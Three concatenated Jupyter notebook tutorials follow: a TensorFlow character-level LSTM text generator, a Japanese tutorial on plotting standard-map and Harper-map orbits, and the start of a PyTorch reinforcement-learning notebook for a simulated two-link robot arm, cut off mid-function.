# After that, we need to split `arr` into $N$ sequences. You can do this using `arr.reshape(size)` where `size` is a tuple containing the dimensions sizes of the reshaped array. We know we want $N$ sequences (`batch_size` below), let's make that the size of the first dimension. For the second dimension, you can use `-1` as a placeholder in the size, it'll fill up the array with the appropriate data for you. After this, you should have an array that is $N \times (M * K)$.
#
# Now that we have this array, we can iterate through it to get our batches. The idea is each batch is a $N \times M$ window on the $N \times (M * K)$ array. For each subsequent batch, the window moves over by `n_steps`. We also want to create both the input and target arrays. Remember that the targets are the inputs shifted over one character.
#
# The way I like to do this window is use `range` to take steps of size `n_steps` from $0$ to `arr.shape[1]`, the total number of steps in each sequence. That way, the integers you get from `range` always point to the start of a batch, and each window is `n_steps` wide.
def get_batches(arr, batch_size, n_steps):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
# Get the number of characters per batch and number of batches we can make
chars_per_batch = batch_size * n_steps
n_batches = len(arr)//chars_per_batch
# Keep only enough characters to make full batches
arr = arr[:n_batches * chars_per_batch]
# Reshape into batch_size rows
arr = arr.reshape((batch_size, -1))
for n in range(0, arr.shape[1], n_steps):
# The features
x = arr[:, n:n+n_steps]
# The targets, shifted by one
y_temp = arr[:, n+1:n+n_steps+1]
# For the very last batch, y will be one character short at the end of
# the sequences which breaks things. To get around this, I'll make an
# array of the appropriate size first, of all zeros, then add the targets.
# This will introduce a small artifact in the last batch, but it won't matter.
y = np.zeros(x.shape, dtype=x.dtype)
y[:,:y_temp.shape[1]] = y_temp
yield x, y
# Now I'll make my data sets and we can check out what's going on here. Here I'm going to use a batch size of 10 and 50 sequence steps.
batches = get_batches(encoded, 10, 50)
x, y = next(batches)
print('x\n', x[:10, :10])
print('\ny\n', y[:10, :10])
# If you implemented `get_batches` correctly, the above output should look something like
# ```
# x
# [[55 63 69 22 6 76 45 5 16 35]
# [ 5 69 1 5 12 52 6 5 56 52]
# [48 29 12 61 35 35 8 64 76 78]
# [12 5 24 39 45 29 12 56 5 63]
# [ 5 29 6 5 29 78 28 5 78 29]
# [ 5 13 6 5 36 69 78 35 52 12]
# [63 76 12 5 18 52 1 76 5 58]
# [34 5 73 39 6 5 12 52 36 5]
# [ 6 5 29 78 12 79 6 61 5 59]
# [ 5 78 69 29 24 5 6 52 5 63]]
#
# y
# [[63 69 22 6 76 45 5 16 35 35]
# [69 1 5 12 52 6 5 56 52 29]
# [29 12 61 35 35 8 64 76 78 28]
# [ 5 24 39 45 29 12 56 5 63 29]
# [29 6 5 29 78 28 5 78 29 45]
# [13 6 5 36 69 78 35 52 12 43]
# [76 12 5 18 52 1 76 5 58 52]
# [ 5 73 39 6 5 12 52 36 5 78]
# [ 5 29 78 12 79 6 61 5 59 63]
# [78 69 29 24 5 6 52 5 63 76]]
# ```
# although the exact numbers will be different. Check to make sure the data is shifted over one step for `y`.
# ## Building the model
#
# Below is where you'll build the network. We'll break it up into parts so it's easier to reason about each bit. Then we can connect them up into the whole network.
#
# <img src="assets/charRNN.png" width=500px>
#
#
# ### Inputs
#
# First off we'll create our input placeholders. As usual we need placeholders for the training data and the targets. We'll also create a placeholder for dropout layers called `keep_prob`.
def build_inputs(batch_size, num_steps):
''' Define placeholders for inputs, targets, and dropout
Arguments
---------
batch_size: Batch size, number of sequences per batch
num_steps: Number of sequence steps in a batch
'''
# Declare placeholders we'll feed into the graph
inputs = tf.placeholder(tf.int32, [batch_size, num_steps], name='inputs')
targets = tf.placeholder(tf.int32, [batch_size, num_steps], name='targets')
# Keep probability placeholder for drop out layers
keep_prob = tf.placeholder(tf.float32, name='keep_prob')
return inputs, targets, keep_prob
# ### LSTM Cell
#
# Here we will create the LSTM cell we'll use in the hidden layer. We'll use this cell as a building block for the RNN. So we aren't actually defining the RNN here, just the type of cell we'll use in the hidden layer.
#
# We first create a basic LSTM cell with
#
# ```python
# lstm = tf.contrib.rnn.BasicLSTMCell(num_units)
# ```
#
# where `num_units` is the number of units in the hidden layers in the cell. Then we can add dropout by wrapping it with
#
# ```python
# tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
# ```
# You pass in a cell and it will automatically add dropout to the inputs or outputs. Finally, we can stack up the LSTM cells into layers with [`tf.contrib.rnn.MultiRNNCell`](https://www.tensorflow.org/versions/r1.0/api_docs/python/tf/contrib/rnn/MultiRNNCell). With this, you pass in a list of cells and it will send the output of one cell into the next cell. Previously with TensorFlow 1.0, you could do this
#
# ```python
# tf.contrib.rnn.MultiRNNCell([cell]*num_layers)
# ```
#
# This might look a little weird if you know Python well because this will create a list of the same `cell` object. However, TensorFlow 1.0 will create different weight matrices for all `cell` objects. But, starting with TensorFlow 1.1 you actually need to create new cell objects in the list. To get it to work in TensorFlow 1.1, it should look like
#
# ```python
# def build_cell(num_units, keep_prob):
# lstm = tf.contrib.rnn.BasicLSTMCell(num_units)
# drop = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
#
# return drop
#
# tf.contrib.rnn.MultiRNNCell([build_cell(num_units, keep_prob) for _ in range(num_layers)])
# ```
#
# Even though this is actually multiple LSTM cells stacked on each other, you can treat the multiple layers as one cell.
#
# We also need to create an initial cell state of all zeros. This can be done like so
#
# ```python
# initial_state = cell.zero_state(batch_size, tf.float32)
# ```
#
# Below, we implement the `build_lstm` function to create these LSTM cells and the initial state.
def build_lstm(lstm_size, num_layers, batch_size, keep_prob):
''' Build LSTM cell.
Arguments
---------
keep_prob: Scalar tensor (tf.placeholder) for the dropout keep probability
lstm_size: Size of the hidden layers in the LSTM cells
num_layers: Number of LSTM layers
batch_size: Batch size
'''
### Build the LSTM Cell
def build_cell(lstm_size, keep_prob):
# Use a basic LSTM cell
lstm = tf.contrib.rnn.BasicLSTMCell(lstm_size)
# Add dropout to the cell
drop = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
return drop
# Stack up multiple LSTM layers, for deep learning
cell = tf.contrib.rnn.MultiRNNCell([build_cell(lstm_size, keep_prob) for _ in range(num_layers)])
initial_state = cell.zero_state(batch_size, tf.float32)
return cell, initial_state
# ### RNN Output
#
# Here we'll create the output layer. We need to connect the output of the RNN cells to a full connected layer with a softmax output. The softmax output gives us a probability distribution we can use to predict the next character.
#
# If our input has batch size $N$, number of steps $M$, and the hidden layer has $L$ hidden units, then the output is a 3D tensor with size $N \times M \times L$. The output of each LSTM cell has size $L$, we have $M$ of them, one for each sequence step, and we have $N$ sequences. So the total size is $N \times M \times L$.
#
# We are using the same fully connected layer, the same weights, for each of the outputs. Then, to make things easier, we should reshape the outputs into a 2D tensor with shape $(M * N) \times L$. That is, one row for each sequence and step, where the values of each row are the output from the LSTM cells.
#
# One we have the outputs reshaped, we can do the matrix multiplication with the weights. We need to wrap the weight and bias variables in a variable scope with `tf.variable_scope(scope_name)` because there are weights being created in the LSTM cells. TensorFlow will throw an error if the weights created here have the same names as the weights created in the LSTM cells, which they will be default. To avoid this, we wrap the variables in a variable scope so we can give them unique names.
def build_output(lstm_output, in_size, out_size):
''' Build a softmax layer, return the softmax output and logits.
Arguments
---------
x: Input tensor
in_size: Size of the input tensor, for example, size of the LSTM cells
out_size: Size of this softmax layer
'''
# Reshape output so it's a bunch of rows, one row for each step for each sequence.
# That is, the shape should be batch_size*num_steps rows by lstm_size columns
seq_output = tf.concat(lstm_output, axis=1)
x = tf.reshape(seq_output, [-1, in_size])
# Connect the RNN outputs to a softmax layer
with tf.variable_scope('softmax'):
softmax_w = tf.Variable(tf.truncated_normal((in_size, out_size), stddev=0.1))
softmax_b = tf.Variable(tf.zeros(out_size))
# Since output is a bunch of rows of RNN cell outputs, logits will be a bunch
# of rows of logit outputs, one for each step and sequence
logits = tf.matmul(x, softmax_w) + softmax_b
# Use softmax to get the probabilities for predicted characters
out = tf.nn.softmax(logits, name='predictions')
return out, logits
# ### Training loss
#
# Next up is the training loss. We get the logits and targets and calculate the softmax cross-entropy loss. First we need to one-hot encode the targets, we're getting them as encoded characters. Then, reshape the one-hot targets so it's a 2D tensor with size $(M*N) \times C$ where $C$ is the number of classes/characters we have. Remember that we reshaped the LSTM outputs and ran them through a fully connected layer with $C$ units. So our logits will also have size $(M*N) \times C$.
#
# Then we run the logits and targets through `tf.nn.softmax_cross_entropy_with_logits` and find the mean to get the loss.
def build_loss(logits, targets, lstm_size, num_classes):
''' Calculate the loss from the logits and the targets.
Arguments
---------
logits: Logits from final fully connected layer
targets: Targets for supervised learning
lstm_size: Number of LSTM hidden units
num_classes: Number of classes in targets
'''
# One-hot encode targets and reshape to match logits, one row per batch_size per step
y_one_hot = tf.one_hot(targets, num_classes)
y_reshaped = tf.reshape(y_one_hot, logits.get_shape())
# Softmax cross entropy loss
loss = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y_reshaped)
loss = tf.reduce_mean(loss)
return loss
# ### Optimizer
#
# Here we build the optimizer. Normal RNNs have have issues gradients exploding and disappearing. LSTMs fix the disappearance problem, but the gradients can still grow without bound. To fix this, we can clip the gradients above some threshold. That is, if a gradient is larger than that threshold, we set it to the threshold. This will ensure the gradients never grow overly large. Then we use an AdamOptimizer for the learning step.
def build_optimizer(loss, learning_rate, grad_clip):
''' Build optmizer for training, using gradient clipping.
Arguments:
loss: Network loss
learning_rate: Learning rate for optimizer
'''
# Optimizer for training, using gradient clipping to control exploding gradients
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(loss, tvars), grad_clip)
train_op = tf.train.AdamOptimizer(learning_rate)
optimizer = train_op.apply_gradients(zip(grads, tvars))
return optimizer
# ### Build the network
#
# Now we can put all the pieces together and build a class for the network. To actually run data through the LSTM cells, we will use [`tf.nn.dynamic_rnn`](https://www.tensorflow.org/versions/r1.0/api_docs/python/tf/nn/dynamic_rnn). This function will pass the hidden and cell states across LSTM cells appropriately for us. It returns the outputs for each LSTM cell at each step for each sequence in the mini-batch. It also gives us the final LSTM state. We want to save this state as `final_state` so we can pass it to the first LSTM cell in the the next mini-batch run. For `tf.nn.dynamic_rnn`, we pass in the cell and initial state we get from `build_lstm`, as well as our input sequences. Also, we need to one-hot encode the inputs before going into the RNN.
class CharRNN:
def __init__(self, num_classes, batch_size=64, num_steps=50,
lstm_size=128, num_layers=2, learning_rate=0.001,
grad_clip=5, sampling=False):
# When we're using this network for sampling later, we'll be passing in
# one character at a time, so providing an option for that
if sampling == True:
batch_size, num_steps = 1, 1
else:
batch_size, num_steps = batch_size, num_steps
tf.reset_default_graph()
# Build the input placeholder tensors
self.inputs, self.targets, self.keep_prob = build_inputs(batch_size, num_steps)
# Build the LSTM cell
cell, self.initial_state = build_lstm(lstm_size, num_layers, batch_size, self.keep_prob)
### Run the data through the RNN layers
# First, one-hot encode the input tokens
x_one_hot = tf.one_hot(self.inputs, num_classes)
# Run each sequence step through the RNN and collect the outputs
outputs, state = tf.nn.dynamic_rnn(cell, x_one_hot, initial_state=self.initial_state)
self.final_state = state
# Get softmax predictions and logits
self.prediction, self.logits = build_output(outputs, lstm_size, num_classes)
# Loss and optimizer (with gradient clipping)
self.loss = build_loss(self.logits, self.targets, lstm_size, num_classes)
self.optimizer = build_optimizer(self.loss, learning_rate, grad_clip)
# ## Hyperparameters
#
# Here I'm defining the hyperparameters for the network.
#
# * `batch_size` - Number of sequences running through the network in one pass.
# * `num_steps` - Number of characters in the sequence the network is trained on. Larger is better typically, the network will learn more long range dependencies. But it takes longer to train. 100 is typically a good number here.
# * `lstm_size` - The number of units in the hidden layers.
# * `num_layers` - Number of hidden LSTM layers to use
# * `learning_rate` - Learning rate for training
# * `keep_prob` - The dropout keep probability when training. If you're network is overfitting, try decreasing this.
#
# Here's some good advice from <NAME> on training the network. I'm going to copy it in here for your benefit, but also link to [where it originally came from](https://github.com/karpathy/char-rnn#tips-and-tricks).
#
# > ## Tips and Tricks
#
# >### Monitoring Validation Loss vs. Training Loss
# >If you're somewhat new to Machine Learning or Neural Networks it can take a bit of expertise to get good models. The most important quantity to keep track of is the difference between your training loss (printed during training) and the validation loss (printed once in a while when the RNN is run on the validation data (by default every 1000 iterations)). In particular:
#
# > - If your training loss is much lower than validation loss then this means the network might be **overfitting**. Solutions to this are to decrease your network size, or to increase dropout. For example you could try dropout of 0.5 and so on.
# > - If your training/validation loss are about equal then your model is **underfitting**. Increase the size of your model (either number of layers or the raw number of neurons per layer)
#
# > ### Approximate number of parameters
#
# > The two most important parameters that control the model are `lstm_size` and `num_layers`. I would advise that you always use `num_layers` of either 2/3. The `lstm_size` can be adjusted based on how much data you have. The two important quantities to keep track of here are:
#
# > - The number of parameters in your model. This is printed when you start training.
# > - The size of your dataset. 1MB file is approximately 1 million characters.
#
# >These two should be about the same order of magnitude. It's a little tricky to tell. Here are some examples:
#
# > - I have a 100MB dataset and I'm using the default parameter settings (which currently print 150K parameters). My data size is significantly larger (100 mil >> 0.15 mil), so I expect to heavily underfit. I am thinking I can comfortably afford to make `lstm_size` larger.
# > - I have a 10MB dataset and running a 10 million parameter model. I'm slightly nervous and I'm carefully monitoring my validation loss. If it's larger than my training loss then I may want to try to increase dropout a bit and see if that helps the validation loss.
#
# > ### Best models strategy
#
# >The winning strategy to obtaining very good models (if you have the compute time) is to always err on making the network larger (as large as you're willing to wait for it to compute) and then try different dropout values (between 0,1). Whatever model has the best validation performance (the loss, written in the checkpoint filename, low is good) is the one you should use in the end.
#
# >It is very common in deep learning to run many different models with many different hyperparameter settings, and in the end take whatever checkpoint gave the best validation performance.
#
# >By the way, the size of your training and validation splits are also parameters. Make sure you have a decent amount of data in your validation set or otherwise the validation performance will be noisy and not very informative.
#
batch_size = 100 # Sequences per batch
num_steps = 100 # Number of sequence steps per batch
lstm_size = 512 # Size of hidden layers in LSTMs
num_layers = 2 # Number of LSTM layers
learning_rate = 0.001 # Learning rate
keep_prob = 0.5 # Dropout keep probability
# ## Time for training
#
# This is typical training code, passing inputs and targets into the network, then running the optimizer. Here we also get back the final LSTM state for the mini-batch. Then, we pass that state back into the network so the next batch can continue the state from the previous batch. And every so often (set by `save_every_n`) I save a checkpoint.
#
# Here I'm saving checkpoints with the format
#
# `i{iteration number}_l{# hidden layer units}.ckpt`
# +
epochs = 20
# Print losses every N interations
print_every_n = 50
# Save every N iterations
save_every_n = 200
model = CharRNN(len(vocab), batch_size=batch_size, num_steps=num_steps,
lstm_size=lstm_size, num_layers=num_layers,
learning_rate=learning_rate)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
# Use the line below to load a checkpoint and resume training
#saver.restore(sess, 'checkpoints/______.ckpt')
counter = 0
for e in range(epochs):
# Train network
new_state = sess.run(model.initial_state)
loss = 0
for x, y in get_batches(encoded, batch_size, num_steps):
counter += 1
start = time.time()
feed = {model.inputs: x,
model.targets: y,
model.keep_prob: keep_prob,
model.initial_state: new_state}
batch_loss, new_state, _ = sess.run([model.loss,
model.final_state,
model.optimizer],
feed_dict=feed)
if (counter % print_every_n == 0):
end = time.time()
print('Epoch: {}/{}... '.format(e+1, epochs),
'Training Step: {}... '.format(counter),
'Training loss: {:.4f}... '.format(batch_loss),
'{:.4f} sec/batch'.format((end-start)))
if (counter % save_every_n == 0):
saver.save(sess, "checkpoints/i{}_l{}.ckpt".format(counter, lstm_size))
saver.save(sess, "checkpoints/i{}_l{}.ckpt".format(counter, lstm_size))
# -
# #### Saved checkpoints
#
# Read up on saving and loading checkpoints here: https://www.tensorflow.org/programmers_guide/variables
tf.train.get_checkpoint_state('checkpoints')
# ## Sampling
#
# Now that the network is trained, we'll can use it to generate new text. The idea is that we pass in a character, then the network will predict the next character. We can use the new one, to predict the next one. And we keep doing this to generate all new text. I also included some functionality to prime the network with some text by passing in a string and building up a state from that.
#
# The network gives us predictions for each character. To reduce noise and make things a little less random, I'm going to only choose a new character from the top N most likely characters.
#
#
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime="The "):
samples = [c for c in prime]
model = CharRNN(len(vocab), lstm_size=lstm_size, sampling=True)
saver = tf.train.Saver()
with tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = vocab_to_int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(vocab))
samples.append(int_to_vocab[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(vocab))
samples.append(int_to_vocab[c])
return ''.join(samples)
# Here, pass in the path to a checkpoint and sample from the network.
tf.train.latest_checkpoint('checkpoints')
checkpoint = tf.train.latest_checkpoint('checkpoints')
samp = sample(checkpoint, 2000, lstm_size, len(vocab), prime="Far")
print(samp)
checkpoint = 'checkpoints/i200_l512.ckpt'
samp = sample(checkpoint, 1000, lstm_size, len(vocab), prime="Far")
print(samp)
checkpoint = 'checkpoints/i600_l512.ckpt'
samp = sample(checkpoint, 1000, lstm_size, len(vocab), prime="Far")
print(samp)
checkpoint = 'checkpoints/i1200_l512.ckpt'
samp = sample(checkpoint, 1000, lstm_size, len(vocab), prime="Far")
print(samp)
|
intro-to-rnns/Anna_KaRNNa_Solution.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + active=""
# 本ページのipython notebookのデータは :download:`ここ <std.ipynb>` からダウンロードできます
# -
# # 古典写像系
#
#
# 次の時間に依存するハミルトニアン
#
# $$
# H(q,p,t) = T(p) + V(q)\sum_{n=-\infty}^{\infty}\delta(t-n) \tag{1}
# $$
#
# を考えます.第二項はポテンシャル項による摂動が時刻$t=n (n=\cdots,-1,0,1,\cdots)$ にのみ離散的に印加されていることを表しています.
# (1)のハミルトンの運動方程式(ニュートン方程式)は
#
# $$
# \begin{split}
# p_{n+1} &= p_{n} - V'(q_{n})\\
# q_{n+1} &= q_{n} + T'(p_{n+1})
# \end{split}
# $$
#
# によって記述されます.
# ここで$V'(q), T'(p)$はそれぞれ$\frac{dV}{dq}, \frac{dT}{dp}$.
# 添字の$n$は$n$回目の撃力印加を意味します.写像の式の下段の$p_{n+1}$の添字がであることに注意して下さい.
#
# ### 標準写像
#
# $T(p)=p^2/2, V(q) = k\cos(2\pi q)/(2\pi)^2$ とすると写像は
#
# $$
# \begin{split}
# q' & = q + \frac{k}{2\pi} \sin(2\pi q)\\
# p' & = p + q'
# \end{split}
# $$
#
# で与えられます.この写像は [標準写像](http://www.scholarpedia.org/article/Chirikov_standard_map) と呼ばれます.
# ### 例題 1
#
# 手始めにSimpleQmapを用いずに標準写像によって与えられる軌道列を計算してみる
# なお,本ページはipython notebookを用いて作られているため,コードを実行する際には %matplotlib inline を無視しして下さい.
# ipython notebook を使用しない場合は下記コマンドは無視して下さい
# %matplotlib inline
# +
import numpy as np
import matplotlib.pyplot as plt
twopi = 2.0*np.pi
# 写像の定義
def Map(q,p,k):
pp = p + k*np.sin(q*twopi)/twopi
qq = q + pp
return [qq,pp]
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(1,1,1)
sample=50
tmax = 500
k=1
q = np.random.random(sample)
p = np.random.random(sample)
traj = [np.array([]),np.array([])]
for i in range(tmax):
q,p = Map(q,p,k)
q = q - np.floor(q)
p = p - np.floor(p)
traj[0] = np.append(traj[0],q)
traj[1] = np.append(traj[1],p)
ax.plot(traj[0],traj[1],',k')
plt.show()
# -
# ### 例題 2
#
# SimpleQmapは標準写像のみデフォルトで定義されておりソースコードは SimpleQmap/maps.py にある.
# ソースコードを見れば分かる通りごちゃごちゃ書かれているがコメント部分を取り除くと基本的に次の通りである
# +
import numpy
twopi=2.0*numpy.pi
class Symplectic(object):
pass
class StandardMap(Symplectic):
def __init__(self, k):
self.k = k
def func0(self, x):
return -self.k*numpy.sin(twopi*x)/twopi
def func1(self, x):
return x
def ifunc0(self, x):
return self.k*numpy.cos(twopi*x)/(twopi*twopi)
def ifunc1(self, x):
return 0.5*x*x
# -
# python のclass については公式を参照して下さい(http://docs.python.jp/3.5/tutorial/classes.html)
#
# 上記でで意義されたSymplectic のclassは基本的に意味の無いクラスなので無視して下さい.
# StandardMapのクラスは func0, func1, ifunc0, ifunc1のmethodが定義されています.
# それぞれ(1)式のハミルトニアンの
#
# func0: $\frac{dV(q)}{dq}$
#
# func1: $\frac{dT(p)}{dp}$
#
# ifunc0: $V(q)$
#
# ifunc1: $T(p)$
#
# に対応します.無理にこのクラスを使う必要はありませんが,SimpleQmapを使って上のプログラムと同じモノを書くと次のようになる.
# +
import numpy as np
import matplotlib.pyplot as plt
import SimpleQmap as sq
twopi = 2.0*np.pi
def Map(q,p, cmap):
pp = p - cmap.func0(q)
qq = q + cmap.func1(pp)
return [qq,pp]
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(1,1,1)
sample=50
tmax = 500
k=1
cmap = sq.StandardMap(k)
q = np.random.random(sample)
p = np.random.random(sample)
traj = [np.array([]),np.array([])]
for i in range(tmax):
q,p = Map(q,p,cmap)
q = q - np.floor(q)
p = p - np.floor(p)
traj[0] = np.append(traj[0],q)
traj[1] = np.append(traj[1],p)
ax.plot(traj[0],traj[1],',k')
plt.show()
# -
# ### 継承の例
#
# SimpleQmapでは標準写像しか定義されていませんが,実際には異なる写像を定義したい場合があるでしょう.
# ここでは例題としてStandardMap のclassを継承してHarperMapを定義します.
#
# Harper写像は
#
# $$
# \begin{split}
# p_{n+1} &= q_{n} + k\sin(2\pi q_n)/(2\pi)\\
# q_{n+1} & = q_{n} + a\sin(2\pi p_{n+1})/(2\pi)
# \end{split}
# $$
#
# と定義します.そうすると $V(q)$の定義が標準写像と共通する為,T(p)の定義を書き換える(オーバーライド)するだけですみます.
# プログラムは例えば以下の様になります.
# +
import numpy as np
import matplotlib.pyplot as plt
import SimpleQmap as sq
twopi = 2.0*np.pi
class HarperMap(sq.StandardMap):
def __init__(self, k,a):
sq.StandardMap.__init__(self,k)
self.a = a
def func1(self, x):
return a*np.sin(twopi*x)/twopi
def ifunc1(self,x):
return -a*np.cos(twopi*x)/twopi/twopi
def Map(q,p, cmap):
pp = p - cmap.func0(q)
qq = q + cmap.func1(pp)
return [qq,pp]
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(1,1,1)
sample=50
tmax = 500
k,a=1,1
cmap = HarperMap(k,a)
q = np.random.random(sample)
p = np.random.random(sample)
traj = [np.array([]),np.array([])]
for i in range(tmax):
q,p = Map(q,p,cmap)
q = q - np.floor(q)
p = p - np.floor(p)
traj[0] = np.append(traj[0],q)
traj[1] = np.append(traj[1],p)
ax.plot(traj[0],traj[1],',k')
plt.show()
# -
|
docs/tutorial/std.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Reinforcement Learning to Control a Robot Arm
#
# This notebook is on based a reinforcement learning assignment in Professor <NAME>'s machine learning course (CS545) at Colorado State University and is shared here with his permission. Changes to the original notebook include:
#
# * Neural network implementation in `Pytorch`, including GPU set up
# * Augmented state functions to include polar coordinates
# * Variable goal states
#
# The Robot class and state functions have been slightly modified to allow for random goal generation, otherwise the `Robot` class and `state` code is left as is from the assignment.
# ## Overview of problem setup
#
# This notebook walks through a Reinforcement Learning (RL) set up for a simulation of a two-dimensional robot arm with multiple links and joints. A neural network is used to approximate the Q function to predict the reinforcements from each action given a state. The reinforcement is the distance to a goal for the end of the robot's arm, and lower reinforcements are better.
#
# The state of the arm is the angles of each joint. Joint angles are represented with the sine and cosine of the angle, to deal with the discontinuity between 1 and 359 degrees, as the state input to the neural network. The addition of polar coordinates to the state is also tested to see if this helps learning. Valid actions on each step will be $-0.1$, $0$, and $+0.1$ applied to each joint.
#
# The Q function is modeled with neural network built using `Pytorch`, this is refered to as the `Qnet` throughout the notebook. The Pytorch implementation includes flags for running on the `cpu` and `gpu`. Model architecture is defined in the `MLP` class and the number and size of layers is defined dynamically using inputs to the call to the constructor. Normalization layers are also added by default to help with model training. Traditional data normalization is challenging in RL models since the training data is generated during training and we don't know the means and standard deviations before training. Adding layer normalization seems to have helped in this regard by improving the accuracy and speed of training.
#
# After initial testing of the training functions, a parameter grid search is performed in order to find a good model that can handle a variable goal state. Training results are sorted by the mean reinforcement, R, for the last 20 training trials and the model with the lowest mean reinforcement is selected as the best model. Plots and animations are constructed to visualize training the performance of the combinations of parameters.
# ## Set up
import numpy as np
import pandas as pd
from sklearn.model_selection import ParameterGrid
import copy
import matplotlib.pyplot as plt
import seaborn as sns
import sys
import itertools # for product (cross product)
from math import pi
from IPython.display import display, clear_output
import time
import joblib
# set plot size parameter
plt.rcParams["figure.figsize"] = (8,4.5)
# Import packages for model training.
# +
# import dl and ml packages
import torch
import torch.nn as nn
import torch.nn.functional as F
from sklearn.model_selection import ParameterGrid
from datetime import datetime
# -
# see if the GPU is available
torch.cuda.is_available()
# current gpu device number
torch.cuda.current_device()
# +
# This will set the device based on the GPUs availability
# the device will be updated later to test running on the GPU and CPU
if torch.cuda.is_available():
torch.cuda.set_device(0)
device = "cuda:" + str(torch.cuda.current_device())
else:
device = "cpu"
print(device)
# -
# # `Robot` Class
#
# Here is an implementation of the robot simulation:
class Robot():
def __init__(self, link_lengths):
self.n_links = len(link_lengths)
self.record_angles = False
self.angles = []
self.link_lengths = np.array(link_lengths)
self.joint_angles = np.zeros(self.n_links)
self.points = [[10, 10] for _ in range(self.n_links + 1)]
self.lim = sum(link_lengths)
self.update_points()
self.goal = None
def set_goal(self, g):
self.goal = g
def set_rand_goal(self):
theta = np.random.uniform(0, 2*pi)
radius = np.random.uniform(0, self.lim * 1.1)
x = radius*np.cos(theta)
y = radius*np.sin(theta)
self.goal = [x+10,y+10]
return None
def get_goal(self):
return self.goal
def get_theta_r_goal(self):
goal = robot.get_goal()
goal = [goal[0]-10, goal[1]-10]
theta = np.arctan2(goal[0],goal[1])-pi/2
r = np.sqrt(np.sum(goal)**2)
return [theta, r]
def dist_to_goal(self):
return np.sqrt(np.sum((self.goal - self.end_effector)**2))
def update_joints(self, joint_angles):
self.joint_angles = joint_angles
self.update_points()
def add_to_joints(self, joint_angle_deltas):
if isinstance(joint_angle_deltas, torch.Tensor):
joint_angle_deltas = joint_angle_deltas.numpy()
self.joint_angles += joint_angle_deltas
too_high = self.joint_angles > 2 * pi
self.joint_angles[too_high] = self.joint_angles[too_high] - 2 * pi
too_low = self.joint_angles < 0
self.joint_angles[too_low] = self.joint_angles[too_low] + 2 * pi
if self.record_angles:
self.angles.append(self.joint_angles * 180 / pi)
self.update_points()
def update_points(self):
for i in range(1, self.n_links + 1):
self.points[i][0] = (self.points[i - 1][0]
+ self.link_lengths[i - 1] * np.cos(np.sum(self.joint_angles[:i])))
self.points[i][1] = (self.points[i - 1][1] +
self.link_lengths[i - 1] * np.sin(np.sum(self.joint_angles[:i])))
self.end_effector = np.array(self.points[self.n_links]).T
def get_angles(self):
return self.joint_angles
def get_link_lengths(self):
return self.link_lengths
def plot(self, style):
for i in range(self.n_links + 1):
if i is not self.n_links:
plt.plot([self.points[i][0], self.points[i + 1][0]],
[self.points[i][1], self.points[i + 1][1]], style)
plt.plot(self.points[i][0], self.points[i][1], 'k.')
plt.axis('off')
plt.axis('square')
plt.xlim([-1, 21])
plt.ylim([-1, 21])
def animate(self, n_steps, Qnet=None, state_f=None, show_all_steps=False, device='cpu'):
fig = plt.figure(figsize=(8, 8))
for i in range(n_steps):
if not show_all_steps:
fig.clf()
plt.scatter(self.goal[0], self.goal[1], s=80)
if Qnet:
action, Qvalue = epsilon_greedy(self, Qnet, valid_actions, state_f, epsilon=0, device=device)
else:
action = [0.1] * self.n_links
self.add_to_joints(action)
style = 'b-' if show_all_steps and i+1 == n_steps else 'r-'
self.plot(style)
if not show_all_steps:
clear_output(wait=True)
display(fig)
if not show_all_steps:
clear_output(wait=True)
# To use this class, first instantiate a robot by specifying the number of links and the lengths of each link as a list. Imagine the end of the last link of the robot has a gripper. Set the goal location for the gripper by calling `robot.set_goal()`.
#
# Then you can animate the robot for some number of steps.
robot = Robot([4, 3])
#robot.set_goal([10, 10])
robot.set_rand_goal()
print(robot.get_goal())
# goal in polar coordinates
robot.get_theta_r_goal()
# animate the robot for 50 steps
robot.animate(50)
# trace the steps of the robot
robot = Robot([4, 3])
robot.set_goal([4, 5])
robot.animate(100, show_all_steps=True)
# # Reinforcement Learning Problem for Controlling the Robot
# From the original assignment:
#
# To define the reinforcement learning problem for controlling this robot and trying to move the gripper as close to the goal as you can, we need to define the three main functions that define a reinforcement learning problem. These are pretty easy with the functions available to us in the `Robot` class. We will also need a function to represent the joint angles as sines and cosines.
#
# State functions with `*_w_angles` were added. These functions add the polar coordinates to the state, thus they return the Cartesian and polar coordinates for the state and the goal.
# +
def angles_to_sin_cos(angles):
return np.hstack((np.sin(angles), np.cos(angles)))
def get_state(robot):
state = np.hstack([angles_to_sin_cos(robot.get_angles()), robot.get_goal()])
return state
def get_state_w_angles(robot):
state = np.hstack([get_state(robot), # in cartesian coords
robot.get_angles(), robot.get_link_lengths(), robot.get_theta_r_goal()])
return state
def initial_state(robot):
